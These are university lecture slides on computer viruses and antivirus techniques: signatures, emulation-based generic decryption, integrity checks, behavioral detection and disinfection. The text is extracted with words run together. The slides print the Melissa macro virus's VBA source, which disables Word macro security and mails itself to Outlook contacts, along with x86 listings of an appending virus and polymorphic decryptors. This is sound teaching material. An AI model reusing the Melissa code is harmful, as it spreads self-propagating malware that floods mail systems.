View
4
Download
0
Category
Preview:
Citation preview
CSE 127Computer Security
Fall 2015Malware I: Viruses and virus-defense
Stefan Savage
AV sides courtesy Carey Nachenberg
Project 2§ Buffer overflow problems on ARM architecture
§Will be discussed, in depth, at Monday discussion section (including working through first problem!)
§ Due Nov 24th
Recap§ Various ways to compromise software systems based in input and timing Buffer overflows, format string errors, TOCTOU, SQL injection, XSS etc…
§ But once you’ve compromised system, then what does the malicious software do?
§ First: propagates itself to create an installed base
§ Today: viruses – the oldest mass malware
November 7, 2015
Viruses§ A computer virus is a (malicious) program
Attaches to a host program or data Creates (possibly modified) copies of itself Payload of program may have other effects (deleting files, opening backdoors, printing messages, etc)
§ Viruses traditionally require some user action to activate (i.e. execute some file, open some spreadsheet, etc)
November 7, 2015
Virus Writer’s Goals§ Hard to detect§ Hard to destroy or deactivate§ Spreads infection widely/quickly§ Can reinfect a host§ Easy to create
November 7, 2015
Kinds of Viruses§ Boot Sector Viruses
Historically important, but less common today§ Memory Resident Viruses
Standard infected executable§ Macro Viruses
Embedded in documents (like Word docs)§ E-mail/IM Viruses
Spread via attachments§Web platform viruses
Spread on Web sites (e.g. social net applications)
November 7, 2015 7
Boot sector Viruses (old school)
§ Vector: floppy disks§ Bootstrap Process:
Firmware (ROM) copies MBR (master boot record) to memory, jumps to that program
§ MBR (or Boot Sector) Fixed position on disk “Chained” boot sectors permit longer Bootstrap Loaders
MBR boot boot
November 7, 2015
Boot sector Viruses
§ Virus breaks the chain§ Inserts virus code§ Reconnects chain afterwards
MBR boot bootvirus
November 7, 2015 9
Why attack the Bootstrap?§ Automatically executed before OS is running
Any thus, before detection tools are running§ OS hides boot sector information from users
Hard to discover that the virus is there Harder to fix
§ Any good virus scanning software scans the boot sectors But good bootsector viruses may restore good bootsector during normal operation (replace it when you logout or when anti-virus software isn’t running)
Bootsector malware is back recently with a vengeance (Meebroot/Sinowal)
November 7, 2015 10
Virus Attachment to Host Code
§ Simplest case: insert copy at the beginning of an executable file Runs before other code of the program Historically most common program virus
§ Runs before & after original program Virus can clean up after itself
§ Virus could modify code in place Doesn’t change size, but could change behavior Maybe harder to detect?
OriginalProgram
ModifiedProgram
November 7, 2015
Other virus tricks§ Entry-point obscuring viruses
Virus takes control in middle of program (random code point) and is harder to scan for
§ Polymorphic viruses Virus encrypts body with random key in each generation
§ Metamorphic viruses Virus rewrites self in each generator (semantically equivalent, but different instruction stream)» Instruction substitution, control flow rewriting, etc
November 7, 2015
Other Homes for Viruses§ System Software
IO.sys, NTLDR, NTDETECT.COM autoexec.bat, config.sys, command.com
§ Memory resident software Task manager Window manager Winamp RealPlayer …
November 7, 2015 13
Macro Viruses§ Many applications support Macros§ Macros are just programs§Word processors & Spreadsheets
Startup macro Macros turned on by default
§ Visual Basic Script (VBScript)
November 7, 2015
Melissa Macro Virus§ Implementation
VBA (Visual Basic for Applications) code associated with the "document.open" method of Word
§ Strategy Email message containing an infected Word document as an attachment (social engineering)
Opening Word document triggers virus if macros are enabled
Under certain conditions included attached documents created by the victim
November 7, 2015 15
Melissa Macro Virus: Behavior§ Setup
Lowers the macro security settings Permit all macros to run without warning Checks registry for key value “… by Kwyjibo” HKEY_Current_User\Software\Microsoft\Office\Melissa?
§ Propagation Sends email message to the first 50 entries in every Microsoft Outlook MAPI address book readable by the user executing the macro
November 7, 2015 16
Melissa Macro Virus: Behavior§ Propagation Continued
Infects Normal.doc template file Normal.doc is used by all Word documents
§ “Joke” If minute matches the day of the month, the macro inserts message “Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here.”
November 7, 2015 17
// Melissa Virus Source Code
Private Sub Document_Open()On Error Resume NextIf System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""ThenCommandBars("Macro").Controls("Security...").Enabled = FalseSystem.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&ElseCommandBars("Tools").Controls("Macro").Enabled = FalseOptions.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):Options.SaveNormalPrompt = (1 - 1)End IfDim UngaDasOutlook, DasMapiName, BreakUmOffASliceSet UngaDasOutlook = CreateObject("Outlook.Application")Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"ThenIf UngaDasOutlook = "Outlook" ThenDasMapiName.Logon "profile", "password"For y = 1 To DasMapiName.AddressLists.CountSet AddyBook = DasMapiName.AddressLists(y)x = 1Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)For oo = 1 To AddyBook.AddressEntries.CountPeep = AddyBook.AddressEntries(x)BreakUmOffASlice.Recipients.Add Peepx = x + 1If x > 50 Then oo = AddyBook.AddressEntries.Count
Next ooBreakUmOffASlice.Subject = "Important Message From " &
Application.UserNameBreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else ;;-)"BreakUmOffASlice.Attachments.Add ActiveDocument.FullNameBreakUmOffASlice.SendPeep = ""
Next yDasMapiName.LogoffEnd If
November 7, 2015 19
Melissa Virus§ Transmission Rate
The first confirmed reports of Melissa were received on Friday, March 26, 1999.
By Monday, March 29, it had reached more than 100,000 computers.
One site got 32,000 infected messages in 45 minutes. § Damage
Denial of service: mail systems off-line. Could have been much worse
§ Remedy Filter mail for virus signature (macro in .doc files) Don’t run Macros in unknown documents by default Clean Normal.doc
20
Detecting Viruses
§ Scanning§ Integrity checking§ Heuristic detection
21
Virus Signatures§ Viruses can’t be completely invisible:
Code must be stored somewhere Virus must do something when it runs Idea: look in files for “signature” byte sequences that are unique to the virus
§ Issues Where to scan (beginning of file, whole file, registry settings, etc)
How to scan (look for “ILOVEYOU” string, or actually execute program)
How long to scan (tradeoffs in performance/coverage) How to distinguish polymorphs (research issue)
1. User runs an infected program.
0100 EB1C JMP 011E0102 BE1B02 MOV SI,021B0105 BF1B01 MOV DI,011B0108 8BCE MOV CX,SI010A F7D9 NEG CX010C FC CLD010D B81B01 MOV AX,011B0110 06 PUSH ES0111 50 PUSH AX0112 06 PUSH ES0113 B81801 MOV AX,01180116 50 PUSH AX0117 CB RETF0118 F3 REPZ0119 A4 MOVSB011A CB RETF011B E93221 JMP 2250011E 83C24F ADD DX,+4F0121 8BFA MOV DI,DX0123 81FF8000 CMP DI,00800127 725E JB 01870129 7406 JZ 0131012B C606250273 MOV BYTE PTR [0225],730130 90 NOP0131 FEC5 INC CH0133 7303 JNB 01380135 80C140 ADD CL,400138 B8010C MOV AX,0C01013B 8BD6 MOV DX,SI013D CD13 INT 13
Infected Program
2. Program transfers control to thevirus.
The Simple Virus
3. Virus locates a new program.
0100 EB1C JMP 011E0102 BE1B02 MOV SI,021B0105 BF1B01 MOV DI,011B0108 8BCE MOV CX,SI010A F7D9 NEG CX010C FC CLD010D B81B01 MOV AX,011B0110 06 PUSH ES0111 50 PUSH AX0112 06 PUSH ES0113 B81801 MOV AX,01180116 50 PUSH AX0117 CB RETF0118 F3 REPZ0119 A4 MOVSB011A CB RETF011B E93221 JMP 2250011E 83C24F ADD DX,+4F0121 8BFA MOV DI,DX0123 81FF8000 CMP DI,00800127 725E JB 01870129 7406 JZ 0131012B C606250273 MOV BYTE PTR [0225],730130 90 NOP0131 FEC5 INC CH0133 7303 JNB 01380135 80C140 ADD CL,400138 B8010C MOV AX,0C01013B 8BD6 MOV DX,SI013D CD13 INT 13
Infected Program
0100 B435 MOV AH,350102 B021 MOV AL,210104 CD21 INT 210106 8C06A002 MOV [02A0],ES010A 891E9E02 MOV [029E],BX010E B425 MOV AH,250110 B021 MOV AL,210112 BA2001 MOV DX,01200115 CD21 INT 21
4. Virus appends its logic to theend of the new file.
0117 83C24F ADD DX,+4F011A 8BFA MOV DI,DX011C 81FF8000 CMP DI,00800120 725E JB 01870122 7406 JZ 01310124 C606250273 MOV BYTE PTR [0225],730129 90 NOP012A FEC5 INC CH012C 7303 JNB 0138012E 80C140 ADD CL,400132 B8010C MOV AX,0C010135 8BD6 MOV DX,SI0137 CD13 INT 13
The Simple Virus
5. Virus updates the new programso the virus gets control when the program is launched.
0100 EB1C JMP 011E0102 BE1B02 MOV SI,021B0105 BF1B01 MOV DI,011B0108 8BCE MOV CX,SI010A F7D9 NEG CX010C FC CLD010D B81B01 MOV AX,011B0110 06 PUSH ES0111 50 PUSH AX0112 06 PUSH ES0113 B81801 MOV AX,01180116 50 PUSH AX0117 CB RETF0118 F3 REPZ0119 A4 MOVSB011A CB RETF011B E93221 JMP 2250011E 83C24F ADD DX,+4F0121 8BFA MOV DI,DX0123 81FF8000 CMP DI,00800127 725E JB 01870129 7406 JZ 0131012B C606250273 MOV BYTE PTR [0225],730130 90 NOP0131 FEC5 INC CH0133 7303 JNB 01380135 80C140 ADD CL,400138 B8010C MOV AX,0C01013B 8BD6 MOV DX,SI013D CD13 INT 13
Infected Program
0100 B435 MOV AH,350102 B021 MOV AL,210104 CD21 INT 210106 8C06A002 MOV [02A0],ES010A 891E9E02 MOV [029E],BX010E B425 MOV AH,250110 B021 MOV AL,210112 BA2001 MOV DX,01200115 CD21 INT 210117 83C24F ADD DX,+4F011A 8BFA MOV DI,DX011C 81FF8000 CMP DI,00800120 725E JB 01870122 7406 JZ 01310124 C606250273 MOV BYTE PTR [0225],730129 90 NOP012A FEC5 INC CH012C 7303 JNB 0138012E 80C140 ADD CL,400132 B8010C MOV AX,0C010135 8BD6 MOV DX,SI0137 CD13 INT 13
0100 EB1C JMP 0117
The Simple Virus
25
Head/Tail ScannersMost of these application-infecting viruses attached
themselves to either the top or bottom of the host file:
Host
Virus
Host
VirusSo anti-virus engineersbuilt head/tail scanners.
The scanner loads thehead and tail regions
of the file into a bufferand then scans witha multi-string search
algorithm.
26
So what do the bad guys do?§ Move the virus to the middle of the file§ Becomes prohibitively expensive to scan
Must scan whole file
§ Solution: scalpel scanning Idea: limit scanning to likely entry-points for viruses If you have more time you can also scan for more than just strings (regular expressions)
27
0100 EB04 JMP 1060102 B021 MOV AL,210104 CD21 INT 210106 EB09 JMP 1120108 B404 MOV AH, 04010A 891E9E02 MOV [029E],BX010E B425 MOV AH,250110 B021 MOV AL,210112 E90200 JMP 1170115 CD21 INT 210117 83C24F ADD DX,+4F011A 8BFA MOV DI,DX011C 81FF8000 CMP DI,00800120 725E JB 01870122 7406 JZ 01310124 C606250273 MOV BYTE PTR [0225],730129 90 NOP012A FEC5 INC CH012C 7303 JNB 0138012E 80C140 ADD CL,400132 B8010C MOV AX,0C010135 8BD6 MOV DX,SI0137 CD13 INT 13
Scalpel ScanningJMP1. Locate the main program
entry-point.
2. While the current instruction is a JUMP or a CALL instruction, trace it.
3. If the current instruction is nota JUMP or CALL instruction, search for all fingerprints in this region of the file.
JMP
JMPADD
28
The Encrypted Virus
HOST
KEY1
WjsvtDecrypt
HOST
KEY2
UhqtrDecrypt
Soon after the first generation of executable viruses, virus authors began writing self-encrypting strains.
These viruses carry a small decryption loop that runs first, decrypts the virus body and then launches the virus.
Each time the virus infects a new file, it changes the encryption key so the virus body looks different.
29
1. MOV DI, 120h2. MOV AX, [DI]3. XOR AX, 5132h4. MOV [DI], AX5. ADD DI, 2h6. CMP DI, 2500h7. JNE 38. WJSVTPBMZPL9. NAADJGNANW...
Still easy to detect because the decryption loop stays the same.
The Encrypted VirusThe decryption routine stays the same. Only the key(s) change.
1. MOV DI, 120h2. MOV AX, [DI]3. XOR AX, 0030h4. MOV [DI], AX5. ADD DI, 2h6. CMP DI, 2500h7. JNE 38. PKEPAJHENZAW9. MNANTPOOTIZN...
The encrypted body changes.
30
The Polymorphic Virus§ Polymorphic viruses are self-encrypting viruses with a changing decryption algorithm
§ When infecting a new file, such a virus: Generates brand-new decryption code from scratch
Encrypts a copy of itself using a complementary encryption algorithm
Inserts both the new decryption code and the encrypted body of the virus into target file
31
Virus
Mutation Engine
Virus
Mutation Engine
Host Program
RAM
Decryption Loop
1. User Executes Program
Virus
Mutation Engine
Virus
Mutation Engine
Decryption Loop
The Polymorphic Virus
32
Virus
Mutation Engine
Virus
Mutation Engine
Host Program
RAM
Decryption Loop
1. User Executes Program2. Virus Decrypts Itself
Virus
Mutation Engine
Virus
Mutation Engine
Decryption Loop
The Polymorphic Virus
33
Virus
Mutation Engine
Virus
Mutation Engine
Host Program
RAM
Decryption Loop
1. User Executes Program2. Virus Decrypts Itself
Virus
Mutation Engine
Virus
Mutation Engine
Decryption Loop
The Polymorphic Virus
34
Virus
Mutation Engine
Virus
Mutation Engine
Host Program
RAM
Decryption Loop
1. User Executes Program2. Virus Decrypts Itself
Virus
Mutation Engine
Virus
Mutation Engine
Decryption Loop
The Polymorphic Virus
35
Virus
Mutation Engine
Virus
Mutation Engine
Host Program
RAM
Decryption Loop
3. Virus finds new prog.
Virus
Mutation Engine
Virus
Mutation Engine
Decryption Loop Host Program
(New)
The Polymorphic Virus
36
Virus
Mutation Engine
Virus
Mutation Engine
Host Program
RAM
Decryption Loop
Virus
Mutation Engine
Virus
Mutation Engine
Decryption Loop Host Program
(New)
4. Mutation enginecreates new decryptor.
Decryption Loop’
3. Virus finds new prog.
The Polymorphic Virus
37
Virus
Mutation Engine
Virus
Mutation Engine
Host Program
RAM
Decryption Loop
Virus
Mutation Engine
Virus
Mutation Engine
Decryption Loop
Decryption Loop’
Host Program
(New)
5. Virus makes a new copy of itself and encrypts this copy.
Virus
Mutation Engine
The Polymorphic Virus
38
Virus
Mutation Engine
Virus
Mutation Engine
Host Program
RAM
Decryption Loop
Virus
Mutation Engine
Virus
Mutation Engine
Decryption Loop
Decryption Loop’
Host Program
(New)
5. Virus makes a new copy of itself and encrypts this copy.
Virus
Mutation Engine
The Polymorphic Virus
39
Virus
Mutation Engine
Virus
Mutation Engine
Host Program
RAM
Decryption Loop
Virus
Mutation Engine
Virus
Mutation Engine
Decryption Loop
Decryption Loop’
Host Program
(New)
5. Virus makes a new copy of itself and encrypts this copy.
Virus
Mutation Engine
The Polymorphic Virus
40
Virus
Mutation Engine
Virus
Mutation Engine
Host Program
RAM
Decryption Loop
Virus
Mutation Engine
Virus
Mutation Engine
Decryption Loop
Decryption Loop’
Host Program
(New)
5. Virus makes a new copy of itself and encrypts this copy.
Virus
Mutation Engine
The Polymorphic Virus
41
Virus
Mutation Engine
Virus
Mutation Engine
Host Program
RAM
Decryption Loop
Virus
Mutation Engine
Virus
Mutation Engine
Decryption Loop
Decryption Loop’
Host Program
(New)
Virus
Mutation Engine6. Virus appends the new decryptor and encrypted virus body to new file.
The Polymorphic Virus
42
Virus
Mutation Engine
Virus
Mutation Engine
Host Program
RAM
Decryption Loop
Virus
Mutation Engine
Virus
Mutation Engine
Decryption Loop
Decryption Loop’
Host Program
(New)
Virus
Mutation Engine
Decryption Loop’
Virus
Mutation Engine
The Polymorphic Virus
43
RAM
Virus
Mutation Engine
Virus
Mutation Engine
Decryption Loop
Decryption Loop’
Host Program
(New)
Virus
Mutation Engine
Decryption Loop’
Virus
Mutation Engine
And we have a new infection!
The Polymorphic Virus
44
The Polymorphic VirusAddr Machine Code Mnemonic0100 50 PUSH AX0101 B8347E MOV AX,7E340104 25A907 AND AX,07A90107 95 XCHG BP,AX0108 B840B2 MOV AX,B240010B BABBB8 MOV DX,B8BB010E F7EA IMUL DX0110 93 XCHG BX,AX0111 B8B4D2 MOV AX,D2B40114 03C3 ADD AX,BX0116 2BC5 SUB AX,BP0118 BA479A MOV DX,9A47011B F7E2 MUL DX011D 95 XCHG BP,AX011E B809F4 MOV AX,F4090121 2BC5 SUB AX,BP0123 91 XCHG CX,AX0124 B8AB6A MOV AX,6AAB0127 BA972C MOV DX,2C97012A F7E2 MUL DX012C D1C0 ROL AX,1012E 80E11F AND CL,1F0131 D3E0 SHL AX,CL0133 91 XCHG CX,AX0134 B8E1CE MOV AX,CEE10137 03C1 ADD AX,CX0139 93 XCHG BX,AX013A B84A43 MOV AX,434A013D 29C3 SUB BX,AX013F F7DB NEG BX0141 8B86381B MOV AX,[BP+1B38]0145 8ACB MOV CL,BL0147 D3C8 ROR AX,CL0149 2D23C9 SUB AX,C923014C B108 MOV CL,08014E D3C8 ROR AX,CL0150 8786381B XCHG AX,[BP+1B38]0154 B80765 MOV AX,65070157 BA55B3 MOV DX,B355015A F7E2 MUL DX015C 96 XCHG SI,AX015D 8BC5 MOV AX,BP015F 2BC6 SUB AX,SI0161 BAE337 MOV DX,37E30164 F7E2 MUL DX0166 96 XCHG SI,AX0167 B80765 MOV AX,6507016A BA55B3 MOV DX,B355016D F7E2 MUL DX016F 91 XCHG CX,AX0170 8BC6 MOV AX,SI0172 BACBC5 MOV DX,C5CB0175 F7E2 MUL DX0177 03C1 ADD AX,CX0179 95 XCHG BP,AX017A 45 INC BP017B 45 INC BP017C 75A0 JNZ 011E
Addr Machine Code Mnemonic
0200 BE36F2 MOV SI,F2360203 8BFE MOV DI,SI0205 B807D7 MOV AX,D707 0208 33C7 XOR AX,DI 020A 95 XCHG BP,AX 020B B858AC MOV AX,AC58 020E F7ED IMUL BP0210 2560B1 AND AX,B1600213 95 XCHG BP,AX 0214 B8C0EA MOV AX,EAC0 0217 8BCD MOV CX,BP 0219 80E11F AND CL,1F 021C D3E8 SHR AX,CL 021E 85C0 TEST AX,AX 0220 7503 JNZ 0225 0222 FB STI0223 F1 DB F1 0224 AB STOSW 0225 91 XCHG CX,AX 0226 36 SS:0227 8B852310 MOV AX,[DI+1023]022B D3C0 ROL AX,CL 022D BA4FB9 MOV DX,B94F0230 F7E2 MUL DX 0232 36 SS:0233 89852310 MOV [DI+1023],AX0237 8BEF MOV BP,DI0239 8BFD MOV DI,BP023B 47 INC DI023C 47 INC DI 023D 75C6 JNZ 0205
Here we have a decryption loop from an MtE-based
virus infection.
And here’s a second generation decryption loop of
the same virus strain.
45
Detecting The Polymorphic Virus
So how do we detect such a beast?
B98104%F%1BD????%FBE????%F%53142??%F??C0%F45%F??CC%FE2B98104%8BB????%FBE????%F%53140??%F??C0%F43%F??CC%FE2B98104%F%5BE????%F%53144??%F??C0%F46%F??CC%FE2B98104%F%9BF????%F%53145??%F??C0%F47%F??CC%FE2B98104%F%1BD????%FBF????%F%53143??%F??C0%F47%F??CC%FE2B98104%8BB????%F%1BF????%F%53141??%F??C0%F47%F??CC%FE2
The number of strings (alg. sigs) explodes quickly!Detecting the decryption loop is prone to false positives!
1. Use lots of wildcard strings strings/scripts:
2. X-ray techniques (plaintext attack on encrypted virus body)
46
Assume the file is infected and perform a plain-text attack of the encrypted virus code. This only works for simple schemes (but its often sufficient).
Scanned file: 60 5C 5D 47 14 5D 47 14-55 14 40 51 47 40
54 68 69 73 20 69 73 20-61 20 74 65 73 74Virus plain-text: +
34
+
34
+
34
+
34
The key must be 34!
The scheme must be XOR!
X-ray scanning
Host Program
7 bytes from EOF = “VIRUS”?AMBCAPQYEQYQWERQWERQWERERGQWETWLRW
47
“Generic” Decryption§ Invented by Alan Solomon (a.k.a. Dr. Solomon)
Chose name to obscure how it worked§ Assumptions
Virus gains control of the host immediately Virus decrypts itself deterministically Virus has a some static body that can be detected with traditional signatures
§ Key idea: Emulate code execution until the virus decrypts itself
» Typically use some sort of virtual machine (VM) environment Search for signatures in memory
48
Simulated OSand other data structures
Virus
Mutation Engine
Virus
Mutation Engine
Host Program
Decryption Loop
Virtual Machine
1. Load suspectedprogram into VM.
Host Program
Decryption Loop
Mutation Engine
Virus
2. Allow the programto execute normally.
Modified MemoryProgram Off Disk
Generic Decryption
49
Simulated OSand other data structures
Generic Decryption
Virtual Machine
1. Load suspectedprogram into VM.
Host Program
Decryption Loop
Mutation Engine
Virus
2. Allow the programto execute normally.
3. “Tag” all modifiedmemory as theprogram executes.
Modified Memory
1. Fetch Byte2. Decrypt Byte3. Store Byte4. Loop to 1
50 Virtual Machine Modified Memory
2. Allow the programto execute normally.
3. “Tag” all modifiedmemory as theprogram executes.
Simulated OSand other data structures
Generic Decryption1. Load suspected
program into VM.
Host Program
Decryption Loop
Mutation Engine
Virus
1. Fetch Byte2. Decrypt Byte3. Store Byte4. Loop to 1
51
2. Allow the programto execute normally.
Simulated OSand other data structures
Generic Decryption
Virtual Machine
1. Load suspectedprogram into VM.
Host Program
Decryption Loop
Mutation Engine
Virus
3. “Tag” all modifiedmemory as theprogram executes.
Modified Memory
1. Fetch Byte2. Decrypt Byte3. Store Byte4. Loop to 1
52
Simulated OSand other data structures
Generic Decryption
Virtual Machine
1. Load suspectedprogram into VM.
Host Program
Decryption Loop
Mutation Engine
Virus
2. Allow the programto execute normally.
3. “Tag” all modifiedmemory as theprogram executes.
Modified Memory
1. Fetch Byte2. Decrypt Byte3. Store Byte4. Loop to 1
x
53
Simulated OSand other data structures
Generic Decryption
Virtual Machine
1. Load suspectedprogram into VM.
Host Program
Decryption Loop
Mutation Engine
Virus
2. Allow the programto execute normally.
3. “Tag” all modifiedmemory as theprogram executes.
Modified Memory
1. Fetch Byte2. Decrypt Byte3. Store Byte4. Loop to 1
xAnd on it goes...
54
2. Allow the programto execute normally.
Simulated OSand other data structures
Generic Decryption
Virtual Machine
1. Load suspectedprogram into VM.
Host Program
Decryption Loop
Mutation Engine
Virus
3. “Tag” all modifiedmemory as theprogram executes.
Modified Memory
1. Fetch Byte2. Decrypt Byte3. Store Byte4. Loop to 1
xAnd on it goes... x
55
Simulated OSand other data structures
Generic Decryption
Virtual Machine
1. Load suspectedprogram into VM.
Host Program
Decryption Loop
Mutation Engine
Virus
2. Allow the programto execute normally.
3. “Tag” all modifiedmemory as theprogram executes.
Modified Memory
1. Fetch Byte2. Decrypt Byte3. Store Byte4. Loop to 1
xAnd on it goes... x
x
56
Simulated OSand other data structures
Generic Decryption
Virtual Machine
1. Load suspectedprogram into VM.
Host Program
Decryption Loop
Mutation Engine
Virus
2. Allow the programto execute normally.
3. “Tag” all modifiedmemory as theprogram executes.
Modified Memory
1. Fetch Byte2. Decrypt Byte3. Store Byte4. Loop to 1
xAnd on it goes... x
xx
57
Simulated OSand other data structures
Generic Decryption
Virtual Machine
1. Load suspectedprogram into VM.
Host Program
Decryption Loop
Mutation Engine
Virus
2. Allow the programto execute normally.
3. “Tag” all modifiedmemory as theprogram executes.
Modified Memory
1. Fetch Byte2. Decrypt Byte3. Store Byte4. Loop to 1
xAnd on it goes... x
xx
4. Scan all modifiedareas of virtualmemory for virussignatures.
58
Simulated OSand other data structures
Generic Decryption
Virtual Machine
4. Scan all modifiedareas of virtualmemory for virussignatures.
Host Program
Decryption Loop
Mutation Engine
Virus
1. Load suspectedprogram into VM.
2. Allow the programto execute normally.
3. “Tag” all modifiedmemory as theprogram executes.
Modified Memory
xxxx
KILL KILL KILL
59
Challenges with GD§ How long to emulate program?
Emulate too long and the system slows to a crawl Don’t emulate enough and you might miss the virus
§ Two approaches Heuristic-driven emulation
» Emulate while you see “suspicious” behavior Unusual instruction sequences, sequence modifications of memory, etc
» Suffers from false positives and false negatives & can be avoided
» Prolong execution on uninfected files Profile driven emulation
60
Profile-based EmulationFor each new polymorphic virus strain, engineers identify its key characteristics and then add this profile to the anti-virus
data files.
Fetch and emulate instructions from a program fileas long as its instructions are consistent with at
least one polymorphic virus profile.
When all viruses have been eliminated from consideration, cease emulation.
61
DSCE 1001000000..MtE 0111000001..
SMEG 0001000111..... ...
0100 JMP 1170102 MOV AL,210104 INT 210106 MOV [02A0],ES010A MOV [029E],BX010E MOV AH,250110 MOV AL,210112 MOV DX,01200115 INT 210117 ADD DX,+4F011A MOV DI,DX011C CMP DI,00800120 JB 01870122 JZ 01310124 MOV BYTE PTR [0225],730129 NOP
Profile-based Emulation
62
DSCE 1001000000..MtE 0111000001..
SMEG 1001000111..... ...
0100 JMP 1170102 MOV AL,210104 INT 210106 MOV [02A0],ES010A MOV [029E],BX010E MOV AH,250110 MOV AL,210112 MOV DX,01200115 INT 210117 ADD DX,+4F011A MOV DI,DX011C CMP DI,00800120 JB 01870122 JZ 01310124 MOV BYTE PTR [0225],730129 NOP
Profile-based Emulation
63
DSCE 1001000000..MtE 0111000001..
SMEG 1001100111..... ...
0100 JMP 1170102 MOV AL,210104 INT 210106 MOV [02A0],ES010A MOV [029E],BX010E MOV AH,250110 MOV AL,210112 MOV DX,01200115 INT 210117 ADD DX,+4F011A MOV DI,DX011C CMP DI,00800120 JB 01870122 JZ 01310124 MOV BYTE PTR [0225],730129 NOP
Profile-based Emulation
64
DSCE 1001000000..MtE 0111000001..
SMEG 1001100111..... ...
0100 JMP 1170102 MOV AL,210104 INT 210106 MOV [02A0],ES010A MOV [029E],BX010E MOV AH,250110 MOV AL,210112 MOV DX,01200115 INT 210117 ADD DX,+4F011A MOV DI,DX011C CMP DI,00800120 JB 01870122 JZ 01310124 MOV BYTE PTR [0225],730129 NOP
Profile-based Emulation
and so on...
65
Profile-based Emulation
Poly #1a
Poly #1b
Poly #3Poly
#4
Poly #2
Poly #5
Poly #3b
The profiles are specific to each polymorphic virus, limiting the search space. This reduces the number of iterations
required on uninfected files.
Clean File
Clean File
Clean File
66
Problems§ Time consuming to generate profiles
And if you get one wrong you can miss stuff§ Lots of ways to get around GD
Random viruses» V will only run if the time is between 3 and 4pm
Emulator-aware viruses» V detects its in an emulator and hides
Maxed-out iteration viruses» V takes too long to emulate
Entry-point Obscuring Viruses
67
Entry-point Obscuring Viruses
These viruses do notgain control at the main
program entry-point.
Instead, they modify the host program to transfer control
to the virus at some obfuscated point in the program.
MZ
PE
Section #1 InfoSection #2 InfoSection #3 InfoSection #4 Infocode code code code code codcode code code code code codcode code code code code codcode code code code code codcode code code code code codcode code code code code codcode code code code code codcode code code code code coddata data data data data data ddata data data data data data ddata data data data data data ddata data data data data data d.reloc .reloc .reloc .reloc .relo.reloc .reloc .reloc .reloc .relo.reloc .reloc .reloc .reloc .relo.reloc .reloc .reloc .reloc .relo
Decrypt virus virus virus vivirus virus virus virus virus vivirus virus virus virus virus vivirus virus virus virus virus vi
JMP
68
What to do…§ Tailored code written to detect each strain of virus (knowledgeable about EPO approach)
§ Typically low-level pseudo-code which evaluates program and can invoke emulator when necessary
§ Fast to execute but can be time-consuming to write
§ But it gets worse… Metamorphic viruses Integrated infection
69
The Metamorphic Virus
These viruses rewrite their logic in each new infection! They have no byte-level fingerprint anywhere!
Metamorphic strains use the current infection’s code as a template and then expand and contract sets of instructions
within the body to create a child infection.
Problems:1. Huge analysis time for researchers 2. Researchers forced to write new hand-coded detections for
each new strain3. Scanner performance potentially degrades linearly with each
new metamorphic detection
70
Rather than appending a single large chunk of code to target files, integrated infectors disassemble their host, integrate their logic
throughout the original logic, and reassemble.
Problem: There is no big chunk of code to identify and scan. Disinfection is a nightmare.
Integrated infection
71
Summary: Modern AV programs
§ Its not grep
§ Carefully constructed dictionary of known virus signatures Complex algorithmic signatures, not just strings
§ Whole system emulator executes programs in sandbox, scanning for signatures during execution Heuristics to determine how long to emulate, when to emulate etc….
Lots of tricks for speed
72
Virus Scanning: Pros & Cons§ Pros
Effectively detects known viruses before they can cause harm Few false alarms
§ Cons Can detect only viruses with known signatures
» Assumption is that samples can be obtained Signature set must be kept up to date
» Can take 5mins to identify simple signature, days for complex one
Signature set must be distributed to all clients» Symantec pushes 1.4B updates per day (~60TB)
Virus writers can easily change virus signatures» Packers…
Fundamentally a reactive business
73
Innoculation§ Most viruses use so kind of marker to identify infected files
§ Innoculation: add the marker to clean files so they won’t be infected
§ Drawbacks: Markerless or implicit marker viruses (e.g. file size, checksum)
Lots of different markers for different viruses;; need to change all files
74
Integrity Checks & whitelists§ Virus scanner computes hash or checksum of executable files (or downloads hash of “known good” files) Assumed to be virus free! Stores the hash information
§ Verifies new hash vs. saved one during scan
75
Integrity Checks: Pros & Cons§ Pros
Can detect corruption of executables too Reliable Doesn’t require virus signatures
§ Cons Whitelists need to be comprehensive
» Not useful if 10% of your programs aren’t covered False positives (i.e. recompilation, updates) Can’t use it on documents (they change too often)
76
Behavior-based Detection§ Collection of ad hoc rules that identifies virus behavior or virus-like programs Unusual system call behavior
» E.g. if you try to transmit a buffer that contains the contents of a stack buffer you received from the network
» Uncommon syscall/argument patterns from each codepoint Modification of system executables/templates
» normal.doc Self-modifying and self-referential code Rarely used instructions or lots of NOPs
§ This is where the action was until very recently
77
Behavior-based detection:Pros & Cons
§ Pros Perhaps able to detect unknown viruses
§ Cons Good heuristics are hard to develop Bad heuristics have too many false positives
§ All major AV programs have moved to incorporate behavioral techniques
The latest: Reputation systems§ You’ve just tried to execute a new program§ Your system doesn’t know anything specific about it
§ Score based on reputation Where did program get downloaded from? Have other people run program too? Do they tend to get infected a lot?
Do other features (libraries, compiler, filename, size, symbols, etc) correlate with past malware?
79
Disinfection§ Ok, you found a virus in a file… now what?§ Standard disinfection
Virus saves the beginning of the file it overwrites (for control transfer) so it can correctly execute it later
To clean: find virus, find original host file beginning, find size of virus. Now move original code to beginning, and truncate file to eliminate virus code
Specialized to each virus§ Generic disinfection
Run program and emulate until it restores the file to its normal state (so it can execute normally);; let the virus itself do the tough work
Rewrite cleaned program back to disk Works with roughly covers 70% of viruses Problems: viruses that overwrite code, viruses with unknown entry points, viruses not well modeled by heuristics – when is image clean?)
80
Next time…§ Next time: Worms (and maybe bots)
Recommended